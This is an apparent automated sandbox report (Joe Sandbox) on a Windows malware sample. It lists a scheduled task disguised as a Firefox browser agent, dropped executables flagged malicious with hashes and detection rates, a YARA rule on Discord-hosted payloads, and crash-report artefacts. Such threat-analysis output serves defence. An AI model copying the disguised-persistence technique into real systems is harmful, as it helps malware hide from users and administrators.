                                            • Report size exceeded maximum capacity and may have missing network information.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            20:29:09Task SchedulerRun new task: Firefox Default Browser Agent D3FD9BFE35A9B440 path: C:\Users\user\AppData\Roaming\jgdhbua
                                            20:29:20API Interceptor1x Sleep call for process: CCB2.exe modified
                                            20:29:30API Interceptor8x Sleep call for process: svchost.exe modified
                                            20:29:34API Interceptor1x Sleep call for process: WerFault.exe modified
                                            20:30:03API Interceptor1x Sleep call for process: D502.exe modified
                                            20:30:05API Interceptor6x Sleep call for process: A332.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            No context

                                            Domains

                                            No context

                                            ASN

                                            No context

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BB8A.exe_be9cde9f8afa847dd729874ac7bf4b4f63becc5_1db953ea_1aa14f53\Report.wer
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):65536
                                            Entropy (8bit):0.8138648214423995
                                            Encrypted:false
                                            SSDEEP:96:EMFoXBw0L4UB8OQoJ7R3V6tpXIQcQec6tycEfcw3W+HbHg/8BRTf3o8Fa9iVfOy4:NiXB4UF8HQ0lrjIq/u7sOS274ItL
                                            MD5:35C09D408A6C338FC99B4D619F09234D
                                            SHA1:B557CC04365F06A74899D2F89A372B92FBB1385F
                                            SHA-256:CBE31A4DBB4EE6246323C74A4D8636EB77A11BF8A6BFE3842D16AF7B39046AC6
                                            SHA-512:23E8BB9EC9DB20EDB7C3F061B36208031697495FA4F1FA1164E464EB6011EC43ADD2BDDF616182DE93E436D977E4F0ADCD8ABC7DA6A297C10E57133DFF7A5CB7
                                            Malicious:false
                                            Reputation:unknown
                                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.6.2.1.6.3.4.4.6.0.5.1.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.6.6.2.1.7.2.6.0.2.2.6.4.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.6.7.7.6.f.3.1.-.3.9.c.1.-.4.4.4.8.-.a.6.5.d.-.1.5.b.c.e.0.d.7.7.d.d.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.2.7.9.5.a.6.1.-.b.2.1.1.-.4.7.d.a.-.8.1.1.a.-.f.b.9.d.d.9.f.7.2.2.b.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.B.8.A...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.a.0.-.0.0.0.1.-.0.0.1.b.-.1.f.6.e.-.b.b.0.2.7.d.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.e.8.8.d.1.e.9.a.d.e.e.6.3.e.f.3.0.e.9.c.4.2.3.1.7.4.c.7.6.e.c.0.0.0.0.2.9.0.1.!.0.0.0.0.5.9.9.5.a.e.9.d.0.2.4.7.0.3.6.c.c.6.d.3.e.a.7.4.1.e.7.5.0.4.c.9.1.3.f.1.f.b.7.6.!.B.B.8.A...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.1././.1.2.:.
                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6175.tmp.csv
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):52702
                                            Entropy (8bit):3.051899513483229
                                            Encrypted:false
                                            SSDEEP:1536:DMHZ0DVisN/xdUMvGpto675v1yc+Jqh//W:DMHZ0DVisN/xdUMvGpto675v1yc+Jy/u
                                            MD5:2DEB23693D4D6D1F0B30650211014B40
                                            SHA1:72E6E6CE2182B1A1C1AF4A0A3CEB2DF043DD8191
                                            SHA-256:A481D7F7B26B38CCF3929C4927AD03DA25B187C1C7DE77B62CB298A78A11E31E
                                            SHA-512:B0FB53ECD8DD88A06B32E2FBFE112E4CC7FB15595C30F2D59A9E5B7A7F2F35755B82C5DDBB7CD9C7AF227E80D44149B15251CAD6E1DCB42FFB9D172FE2CB5B85
                                            Malicious:false
                                            Reputation:unknown
                                            Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER65FA.tmp.txt
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):13340
                                            Entropy (8bit):2.6957049550715424
                                            Encrypted:false
                                            SSDEEP:96:9GiZYWEcslyQrYLYQFW0HlYEZAut6izqFXew3OnLMia+U0/q2uIC03:9jZDExs4FeLba+U0/q25C03
                                            MD5:07F06FDC5DEA39B6918FC620424D43B0
                                            SHA1:AFA91D954F8DB12AEC97F6FF59F6746442D2A7E8
                                            SHA-256:EC9A9FD75480B2FACDDAB5125C6E85115E1BF11E991AFD983FBE00112B774021
                                            SHA-512:2D1100B7E3CF54785103B166187A243D718A93467C1909D8D20BD59450D637ACE16A1F913A100557775AC318D3D9CA6B984A44862902AD6346DABB9640CFC449
                                            Malicious:false
                                            Reputation:unknown
                                            Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE40.tmp.dmp
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:Mini DuMP crash report, 14 streams, Fri Jan 14 19:29:24 2022, 0x1205a4 type
                                            Category:dropped
                                            Size (bytes):36708
                                            Entropy (8bit):2.1273152419502526
                                            Encrypted:false
                                            SSDEEP:192:+tJjOn9V/XOeh0kIKTZv5A6KX58TGX9VcNuCuTX4J+EnD3:EebZvyJufJhD3
                                            MD5:B8C8DEEC4450644C4227E014A2F987EF
                                            SHA1:66326B9DCCAEC52DBF078174D55669422F63F8F4
                                            SHA-256:7961AB36D2264DDD76223C005CF57840E173C220670F6850DAD3CD4D2F6041D8
                                            SHA-512:51098772159BCEFF9B35993AC7E7AA43B751DE986CEBBF61CBD80C5271827DF9ACDD78CCB06BE89F1B2000C630EA3B69EB1771BE8DC72D3BD0520BD6DAAD31DE
                                            Malicious:false
                                            Reputation:unknown
                                            Preview: MDMP....... ..........a....................................$...z%..........T.......8...........T................z..........H...........4....................................................................U...........B..............GenuineIntelW...........T..............a.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERB4E9.tmp.WERInternalMetadata.xml
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):8392
                                            Entropy (8bit):3.702812242647528
                                            Encrypted:false
                                            SSDEEP:192:Rrl7r3GLNiZq6q6YrRSUdNgmfGRSV+pDD89bw9sfNQm:RrlsNik6q6Y9SUHgmfGRS9w2fv
                                            MD5:C3E4A8A325B469EFC2F80337215A25E0
                                            SHA1:7D9597D4BA2C8F1AA5F9698D9AC14E33276F309A
                                            SHA-256:323F3D032F6993091B78A9A6710F627860E006AB94D4C6CBDD1E633309E27221
                                            SHA-512:56310025638F81BEA8509B8B3EA414E79F18F3EC41E9C026B941A463A59AB0C025876B1F4412371DD75922931C4EF1B8C4793EF4D51FE04E70A7946606C0EEF6
                                            Malicious:false
                                            Reputation:unknown
                                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.1.6.<./.P.i.d.>.......
                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERB9CC.tmp.xml
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):4685
                                            Entropy (8bit):4.477856827118253
                                            Encrypted:false
                                            SSDEEP:48:cvIwSD8zsLJgtWI9BtWSC8Bu8fm8M4Jd8qF0qv+q8vx8SbTFHOed:uITfl+cSN9JHvK3bhHOed
                                            MD5:F002D88880F6E1E2E1F1BDE33239C82B
                                            SHA1:5AA9856DE403B3B4FCE7154CD49B26FF9BE665FB
                                            SHA-256:78885C4292C966EED96C82261A11912DBD801F44BA2283A7BE01E016751A5452
                                            SHA-512:A64ADF5872BA2DBA40F80F1498000F96F2D310A9A582C84B1F3D01F1311372B69309BAAF0583111AE35880569203172D79EABFD4448C5AA253303084BC0FC4B5
                                            Malicious:false
                                            Reputation:unknown
                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1342360" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3D34.exe.log
                                            Process:C:\Users\user\AppData\Local\Temp\3D34.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):700
                                            Entropy (8bit):5.346524082657112
                                            Encrypted:false
                                            SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                            MD5:65CF801545098D915A06D8318D296A01
                                            SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                            SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                            SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                            Malicious:false
                                            Reputation:unknown
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                            C:\Users\user\AppData\Local\Temp\3D34.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:modified
                                            Size (bytes):537088
                                            Entropy (8bit):5.840438491186833
                                            Encrypted:false
                                            SSDEEP:12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
                                            MD5:D7DF01D8158BFADDC8BA48390E52F355
                                            SHA1:7B885368AA9459CE6E88D70F48C2225352FAB6EF
                                            SHA-256:4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
                                            SHA-512:63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Metadefender, Detection: 46%, Browse
                                            • Antivirus: ReversingLabs, Detection: 89%
                                            Reputation:unknown
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?y*...............0..*...........I... ...`....@.. ....................................@.................................`I..K....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@....reloc...............0..............@..B.................I......H............?..........hX..}............................................(....*..0..,.......(d...8....*.~....u....s....z&8.........8........................*.......*....(d...(....*...j*.......*.......*.......*.......*....(....*.~(....(^...8....*(.........8........*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*....(....*..0.............*....*....0.............*.(....z.A.........z.A.......................*.......*.......*.......*.......
                                            C:\Users\user\AppData\Local\Temp\6C37.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:MS-DOS executable
                                            Category:dropped
                                            Size (bytes):557664
                                            Entropy (8bit):7.687250283474463
                                            Encrypted:false
                                            SSDEEP:12288:fWxcQhhhhhn8bieAtJlllLtrHWnjkQrK8iBHZkshvesxViA9Og+:fWZhhhhhUATlLtrUbK8oZphveoMA9
                                            MD5:6ADB5470086099B9169109333FADAB86
                                            SHA1:87EB7A01E9E54E0A308F8D5EDFD3AF6EBA4DC619
                                            SHA-256:B4298F77E454BD5F0BD58913F95CE2D2AF8653F3253E22D944B20758BBC944B4
                                            SHA-512:D050466BE53C33DAAF1E30CD50D7205F50C1ACA7BA13160B565CF79E1466A85F307FE1EC05DD09F59407FCB74E3375E8EE706ACDA6906E52DE6F2DD5FA3EDDCD
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 50%
                                            Reputation:unknown
                                            Preview: MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L....5...............0..$...*........... ...`....@..........................0.......@....@..................................p..........P)...........................................................................................................idata...`.............................`.pdata.......p......................@....rsrc...P)......0...................@..@.didata..........x..................@.....................................................................................................................................................................................................................................................................................................................g..L.r9..v9.<iP.hL[Kc...",..
                                            C:\Users\user\AppData\Local\Temp\888A.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):7336385
                                            Entropy (8bit):7.993036026488077
                                            Encrypted:true
                                            SSDEEP:196608:l++hvICteEroXxqENE+sKsXXgvkwuUxNhMC/CKN7kL:BInEroXjsKkXgs/EhWKNY
                                            MD5:AE6510D9815C44A818F722ECAE6844B8
                                            SHA1:2A34B5110F5C3C2424AE9685F57261E2546BD963
                                            SHA-256:C3CAD582268B165711E2F2B1834891C7BCB5E57A7EFB1E709E3DF19D011AD656
                                            SHA-512:8CAA9E661403D5D86F69E7C35E45CDF927EF9EC0C6045ED2CA5AF2EAAF26B4F99291EADAF2F0C8C00A31B05B228C6DF0C4BD205A7B3EC70E263313A08FFEF4F8
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            Reputation:unknown
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'X.8c9.kc9.kc9.kwR.jh9.kwR.jd9.kwR.j.9.k.V#kg9.k1L.jE9.k1L.jr9.k1L.jj9.kwR.jh9.kc9.k.9.k.L.jp9.k.L.jb9.kRichc9.k................PE..d.....a.........."......6...T................@....................................%.p...`..................................................[..x...............................H... 9..............................@9..8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data........p.......T..............@....pdata...............`..............@..@_RDATA...............~..............@..@.rsrc...............................@..@.reloc..H...........................@..B........................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Temp\9889.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):3590144
                                            Entropy (8bit):7.997643531968
                                            Encrypted:true
                                            SSDEEP:49152:3+N1VszZfKeEM30gwJHRUy0hsgpJx7SbEmW/DNYwtinYQYwDvvEipRiGqmkNajh1:381EKrHVRA2A/+NWxYZYYDvvNji7o
                                            MD5:DA5C869D0ADE431230679390B5D183BF
                                            SHA1:A0A3EC54CDC7762F78BF1DD2C5594F9A6AF2CBC3
                                            SHA-256:98CE1395284401CDB5EBF5BDBCB02DDE9C404BEB668B7FF985794AE0408A5805
                                            SHA-512:47EA2FF52B50F1E4CB27957451D6C50F2D90B861A4BAF9A96718749368D76491CF9B1D39AA23E059A2A589DC48BD1EF0C529AE201EAD635806CA89A276C82087
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Reputation:unknown
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@..........................pS.....#87.....................................|.N. .....M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@................P......................@.............1..`......................@....rsrc.........M.......0.............@....kujN2o2......N.......2.............@....adata.......`S.......6.............@...........................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Temp\A332.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):905216
                                            Entropy (8bit):7.399713113456654
                                            Encrypted:false
                                            SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                            MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                            SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                            SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                            SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Metadefender, Detection: 34%, Browse
                                            • Antivirus: ReversingLabs, Detection: 77%
                                            Reputation:unknown
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Temp\A4DE.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):20480
                                            Entropy (8bit):5.021094695416705
                                            Encrypted:false
                                            SSDEEP:384:1P27QR0ir3uqVQ1Tf+1rkZlgEdLcHIH+2f9sFIILCbj4KQWylH28iYfx:1PYQR0i4krj58LIL0zy2
                                            MD5:9DA91D9E3AD909FB8EBA4D3D74344982
                                            SHA1:D5B6872D062043478CBA1002A815A013952D3837
                                            SHA-256:0417281135837E3CCC11F35B2D17A6A3672B011E85C18884F54F6FEABA7B8069
                                            SHA-512:29D672F0BB8AEE885F008F7B7EBED499E7C5D8738B9373BF169896BE85C271FAAB5BD9792C176C7CDCB1C39606F07041E1E54E8F893D1D91F49509DF927AA8A0
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\A4DE.exe, Author: Florian Roth
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 35%
                                            Reputation:unknown
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!................0..J..........rh... ........@.. ...............................1....@................................. h..O...................................Tg..8............................................ ............... ..H............text....H... ...J.................. ..`.rsrc................L..............@..@.reloc...............N..............@..B................Th......H........C..."...........e..p...........................................^..}.....(.......(.....*..*..0...............(...%.-...(.....s......s....... ....o...... ....o.....(....r...po......... ....s..........o.....[o....o.........o ....[o....o!......o"......o#....s$............io%......o&.........,...o'......o(........,..o'.........,..o'........+...*..(................"......................0............o).....(*.....s+....+..*...0...........s,.... ....(-.....(........r%..po/.
                                            C:\Users\user\AppData\Local\Temp\BB8A.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):301056
                                            Entropy (8bit):5.192330972647351
                                            Encrypted:false
                                            SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
                                            MD5:277680BD3182EB0940BC356FF4712BEF
                                            SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
                                            SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
                                            SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Metadefender, Detection: 46%, Browse
                                            • Antivirus: ReversingLabs, Detection: 77%
                                            Reputation:unknown
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L.....b_.............................-.......0....@.......................... ...............................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data...X....p...$...b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Temp\CADF.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):7336391
                                            Entropy (8bit):7.993025428513385
                                            Encrypted:true
                                            SSDEEP:196608:76+hvICteEroXxqENE+sKsXXgvkz+AlnhMCRKsAN2aL:DInEroXjsKkXgsCMhkrNF
                                            MD5:CBE604877A46CEEBA112802BC17FFEF8
                                            SHA1:E85AB4CCBE491348C39F751162FFF71A90643ECA
                                            SHA-256:32703A3D88B3E9B8FE1A64FD1CBCC0925FC2C74BCBDEFBBD6944CBFAD0029FEC
                                            SHA-512:86F3946B813FB457D95B6635FA308DA1BF5F2C0FBD5BDCA75F7776D1A01A2D3C67A8A9E268DCC145FF575D70FBE84BE9BEB112A0D2269B955795C74468C00598
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            Reputation:unknown
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'X.8c9.kc9.kc9.kwR.jh9.kwR.jd9.kwR.j.9.k.V#kg9.k1L.jE9.k1L.jr9.k1L.jj9.kwR.jh9.kc9.k.9.k.L.jp9.k.L.jb9.kRichc9.k................PE..d...Q..a.........."......6...T................@......................................p...`..................................................[..x...............................H... 9..............................@9..8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data........p.......T..............@....pdata...............`..............@..@_RDATA...............~..............@..@.rsrc...............................@..@.reloc..H...........................@..B........................................................................................................................................................................................................
